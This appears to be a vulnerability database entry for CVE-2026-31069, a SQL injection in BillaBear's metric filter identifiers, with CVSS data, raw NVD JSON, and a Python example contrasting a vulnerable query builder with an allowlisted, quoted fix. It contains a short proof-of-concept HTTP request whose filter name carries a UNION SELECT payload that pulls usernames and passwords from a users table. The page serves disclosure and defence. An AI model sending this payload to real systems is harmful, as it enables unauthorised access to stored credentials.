Security Vulnerability Report
CVE-2026-31069 CVSS 8.8 HIGH

CVE-2026-31069

Published: 2026-05-19 16:16:20
Last Modified: 2026-05-20 14:16:40

Description

BillaBear (all versions prior to Jan 2026) contains a SQL Injection vulnerability in the EventRepository. User-controlled input from metric filter names and aggregation properties is directly interpolated into SQL queries using sprintf() without proper sanitization or identifier quoting. Although filter values are parameterized, the filter identifiers (keys) are not. An authenticated attacker with ROLE_ACCOUNT_MANAGER permissions can exploit this to execute arbitrary SQL commands.
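The pattern the description names, a filter identifier interpolated into the statement while only the value is bound, shown beside a hardened builder that allowlists and quotes identifiers. This is an added example, not BillaBear's own code: the events table, its column names and the allowlist are constructed for the demo, and SQLite stands in for the project's database.

```python
import sqlite3

# Constructed stand-in for an events table; BillaBear's real schema is not on
# the page, so these column names are an assumption of this example.
ALLOWED_FILTER_COLUMNS = frozenset({"customer_id", "event_name", "region"})
SAMPLE_SCHEMA = """
CREATE TABLE events (customer_id TEXT, event_name TEXT, region TEXT);
INSERT INTO events VALUES ('c1','login','eu'), ('c2','login','us'), ('c1','logout','eu');
"""

def build_filter_sql_vulnerable(filter_name: str) -> str:
    # The pattern the advisory describes: the filter value is bound as a
    # parameter, but the identifier is interpolated into the statement text,
    # so a crafted key changes the query's structure.
    return "SELECT COUNT(*) FROM events WHERE %s = ?" % filter_name

def build_filter_sql_safe(filter_name: str) -> str:
    # Hardened form: identifiers cannot be bound as parameters, so the key is
    # checked against an allowlist of real column names and then quoted.
    if filter_name not in ALLOWED_FILTER_COLUMNS:
        raise ValueError("unknown filter column: %r" % filter_name)
    quoted = '"%s"' % filter_name.replace('"', '""')
    return "SELECT COUNT(*) FROM events WHERE %s = ?" % quoted

def count_events(conn: sqlite3.Connection, filter_name: str, value: str) -> int:
    # Only the hardened builder is ever executed.
    return conn.execute(build_filter_sql_safe(filter_name), (value,)).fetchone()[0]

def demo() -> dict:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    # The key from the page's PoC: with the vulnerable builder it lands in the
    # statement verbatim; with the hardened one it never reaches the database.
    hostile_key = "id) UNION SELECT 1,username,password,4 FROM users-- -"
    try:
        build_filter_sql_safe(hostile_key)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "vulnerable_sql": build_filter_sql_vulnerable(hostile_key),
        "hostile_key_rejected": rejected,
        "eu_events": count_events(conn, "region", "eu"),
    }
```

The same allowlist check applies to the aggregation property the description mentions, since it is also an identifier rather than a bindable value.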

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

BillaBear < January 2026 release

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```http
/*
 * Conceptual PoC for CVE-2026-31069
 * Exploiting the filter name in EventRepository
 */
POST /api/v1/metrics/filter HTTP/1.1
Host: target-billabear.com
Authorization: Bearer <valid_account_manager_token>
Content-Type: application/json

{
  "filters": [
    {
      // Malicious payload injected into the filter identifier (key)
      "name": "id) UNION SELECT 1,username,password,4 FROM users-- -",
      "operator": "eq",
      "value": "test"
    }
  ]
}

/*
 * Explanation:
 * The backend likely constructs SQL like:
 *   sprintf("... WHERE %s = ...", $filter['name'])
 * The payload closes the parenthesis and appends a UNION SELECT to extract data.
 */
```

References

https://gist.github.com/nedlir/2377ba6e7fa2ad957210b52aa8e400d9
https://gist.github.com/nedlir/a50725b94650467f0593b8f4009ae19e
https://github.com/BillaBear/billabear

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-31069",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-19T16:16:20.230",
    "lastModified": "2026-05-20T14:16:40.150",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "BillaBear (all versions prior to Jan 2026) contains a SQL Injection vulnerability in the EventRepository. User-controlled input from metric filter names and aggregation properties is directly interpolated into SQL queries using sprintf() without proper sanitization or identifier quoting. Although filter values are parameterized, the filter identifiers (keys) are not. An authenticated attacker with ROLE_ACCOUNT_MANAGER permissions can exploit this to execute arbitrary SQL commands."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-89" }
        ]
      }
    ],
    "references": [
      { "url": "https://gist.github.com/nedlir/2377ba6e7fa2ad957210b52aa8e400d9", "source": "[email protected]" },
      { "url": "https://gist.github.com/nedlir/a50725b94650467f0593b8f4009ae19e", "source": "[email protected]" },
      { "url": "https://github.com/BillaBear/billabear", "source": "[email protected]" },
      { "url": "https://gist.github.com/nedlir/a50725b94650467f0593b8f4009ae19e", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0" }
    ]
  }
}
```